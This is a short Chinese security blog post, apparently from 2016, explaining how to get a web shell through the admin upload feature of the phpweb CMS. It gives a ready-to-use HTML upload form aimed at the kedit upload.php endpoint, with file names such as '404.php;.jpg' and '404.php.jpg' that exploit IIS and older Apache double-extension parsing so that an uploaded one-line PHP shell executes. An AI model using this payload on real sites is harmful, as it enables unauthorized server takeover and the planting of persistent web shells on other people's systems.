当前位置:首页 > 网络安全 2016年12月26日
phpweb Apache版后台拿SHELL

phpweb Apache版后台拿SHELL          作者: 0x80


一般来说phpweb后台可以通过burp截断的方式拿,不过针对的是IIS

还可以通过

    <form name="uploadForm" method="post" enctype="multipart/form-data" action="http://www.xxx.com/kedit/upload_cgi/upload.php">
    <input type="text" name="fileName" value="404.php;.jpg" />
    <input type="hidden" name="attachPath" value="news/pics/" />
    <input type="file" name="fileData" size="14" /></td>
    <input type="submit" name="button" value="确定" />
    </form>

造成1个IIS解析漏洞 php

那么Apache版 就不能这样了,我们只需要修改一处value=404.php.jpg

上传一句话php

这样去访问


低Apache会解析成php执行,利用的是经典的解析,如shell.php.jpg shell.php.rar shell.php.pdf
高版本Apache,目前没有更好的思路